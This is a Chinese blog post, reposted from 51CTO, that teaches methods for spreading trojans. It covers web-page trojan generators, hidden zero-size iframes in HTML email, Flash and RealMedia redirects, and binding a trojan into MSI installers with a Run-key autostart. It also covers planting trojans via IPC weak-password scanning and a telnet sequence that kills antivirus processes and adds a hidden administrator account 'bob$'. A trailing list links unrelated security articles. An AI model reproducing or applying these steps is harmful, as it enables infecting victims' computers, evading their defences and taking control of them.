木马传播方法介绍

简介:
 
第一:网页木马制作。
本例中,大家可以下载一个“老丁网页木马生成器”。当然如果您看到这篇文章的时间比较晚,你也可以下载个别的。
很简单:把木马文件名字记录下来,例如mm.exe,打开木马生成器,输入http://你的域名/soft/mm.exe,再点生成,再把网页传到空间里,把木马文件mm.exe传到空间里的soft目录。别人看你的网页就会中马。

第二:用方法一做好的木马传到空间上以后,就可以在写邮件的时候,选择HTML编辑方式,再加入以下内容,实现在网页中包含一个框架:
"<iframe src="  [url]http://xxxxx.com/xxxx.htm[/url]" ; width="0" height="0"></iframe>",这招够阴毒。以前试过这一招,挺好用的。
当然,现在的MAIL服务器一般会把这个带框架的邮件过滤掉,好办,你自己安装个邮件服务器就行了吗,推荐用Mdaemon,功能强大配置简单(别告诉我您用sendmail哈,用qmail俺也忍了)
 
第三:在flash文件中捆绑
打开flashMX,新建影片或打开其它影片,创建一个空白关键帧,选择动作-浏览器-双击geturl,输入网页地址,再点动作-影片控制-停止动作,导出电影文件即可。FLASH没怎么用过,这回才知道,原来看flash也要小心啊。

第四:视频传播
用realmedia editor,工具-合并事件  事先写个文本文件,内容是: u 00:5.0 00:8.0 网马网址,这样就可以了。
第五:文件捆绑
不说了,工具太多。
第六:通过MS较新的软件安装包MSI也可以捆绑木马,看来不能掉以轻心。捆绑方法如下:
1、取得正常安装后的文件,最好使用软件的绿色版,把所有文件和木马文件放在同一个目录。
2、使用advance installer,我手上只有一个测试版,据提示只能使用30天,不过我有“永不过期”。新建工程,选择专业版-新建工程向导,点击下一步、浏览选择准备好的目录。
3、有快捷方式的选择地方,把软件包中的主程序勾选,软件语言据实填写。
4、最后一步,绝对不要选:现在创建。这样就会进入下一步,软件的主程序界面。
5、选“文件或文件夹”,点开“windows volume”,新建一个system32,再把木马拽过去,这样MSI安装完成后,木马会自动放在这个目录中。
6、选“注册表”,在HKCU-software-microsoft-windows-current version-run中加载提到的木马文件即可。(当然,如果系统中安装有瑞星这样可以监控系统注册表的软件,安装到此步时会出现提示。)
7、如果木马支持服务启动,也可以在服务-安装服务上点右键-新建服务初始化,
8、在左侧菜单选“自定义操作”,在安装执行顺序下的install上右键,选新建安装的自定义操作,选中木马文件,选“异步执行,不等待返回”,这样可以避免安装出现延迟,在执行选项中选确认(绝不能选立即执行)。
9、F7生成工程文件即可。
第七:配合扫描工具
本例可以使用流光,也可以使用傻瓜IPC扫描器。
1、用流光扫描有IPC漏洞的计算机(就是设置了弱密码计算机)
2、扫描完成后,点工具菜单-IPC工具-种植者
找到配置好的木马文件-再选中木马种植的路径-出现提示“指定的程序将在**秒后执行”
3、等待肉鸡上线即可。
注:本实验成功机率较小,2003 2000等系统为防止有人加自动运行程序,作了保护。如果目标主机上有杀软,也会杀掉木马。如果目标主机没有隐含共享,也没有其它共享目录。
第八:手工开telnet种植
1、使用一个批处理程序:txtelnet,执行以下命令:
txtelnet x.x.x.x 用户名 密码       
输入后,会在2分钟之内打开对方的telnet
如果您不用会,推荐用阿D工具包,很适合新手的。
2、把查看进行和删除进行的两个程序:pslist.exe   pskill.exe  以及木马文件上传到一个FTP服务器。
3、telnet x.x.x.x           "telnet连接目标主机
mget *            "下载所有文件
pslist           查看所有进程
pskill           杀掉杀毒软件进程
执行木马
net user bob$ /add
net localgroup administrators bob$ /add


本文转自 霜寒未试 51CTO博客,原文链接:http://blog.51cto.com/51bbs/147928,如需转载请自行联系原作者
相关文章
|
云安全 域名解析 安全
警惕主动外联!云防火墙检测拦截勒索、Muhstik僵尸网络等 Log4j2漏洞利用
近期,阿里云安全观测到,在 Apache Log4j2 漏洞攻击全程中,无论是在漏洞利用阶段,还是后续要进行验证和进一步的控制利用,大多涉及多次受害服务器的主动外联,云防火墙已陆续发现并拦截60余万次涉及勒索、挖矿家族的漏洞利用行为。
848 0
警惕主动外联!云防火墙检测拦截勒索、Muhstik僵尸网络等 Log4j2漏洞利用
|
11月前
|
安全 API Windows
恶意病毒逆向分析实验1
恶意病毒逆向分析
|
存储 安全 网络安全
2023年多个变种传播的mkp勒索病毒数据怎么处理|数据解密恢复
        恶意软件是当今互联网上最常见的威胁之一,尤其是勒索病毒。[MyFile@waifu.club].mkp勒索病毒、[datastore@cyberfear.com].mkp勒索病毒、[savetime@cyberfear.com].mkp勒索病毒、[torres@proxy.tg].mkp勒索病毒勒索病毒是2023年最新的makop变种勒索病毒,它能够对企业的服务器数据及各种软件数据库进行加密,使得企业的服务器无法正常运行。91数据恢复研究院将介绍.mkp勒索病毒的特征、影响以及如何进行数据恢复。
2023年多个变种传播的mkp勒索病毒数据怎么处理|数据解密恢复
|
人工智能 监控 安全
僵尸网络常见攻击方式曝光,第二种威胁最大
僵尸网络常见攻击方式曝光,第二种威胁最大
|
云安全 监控 安全
攻击者使用showDoc的漏洞传播僵尸网络
近日,阿里云安全团队基于威胁情报挖掘网络攻击日志的过程中,发现了使用showDoc漏洞传播僵尸网络和挖矿软件的攻击事件,使用该手法传播僵尸网络暂未被公开报告过。
1271 0
攻击者使用showDoc的漏洞传播僵尸网络
|
安全
金山毒霸:极虎继续发威 病毒借兽兽门大肆传播
春节长假后的第一周,一连串的病毒纷至沓来,极虎、隐身猫、僵尸网络等等,威胁着广大网民的网络财产安全。金山安全实验室最新监测数据显示,年前爆发的”极虎”病毒在春节后依旧很活跃,日均感染量不断上升;而另一个名为”隐身猫”的病毒,目前累计感染量仅为14190台,危害范围比较小,而且类似金山毒霸等专业杀毒软件均可进行查杀,用户无需过分担心。
1450 0
|
安全 数据安全/隐私保护 内存技术
|
安全 数据安全/隐私保护
|
安全 网络安全 数据安全/隐私保护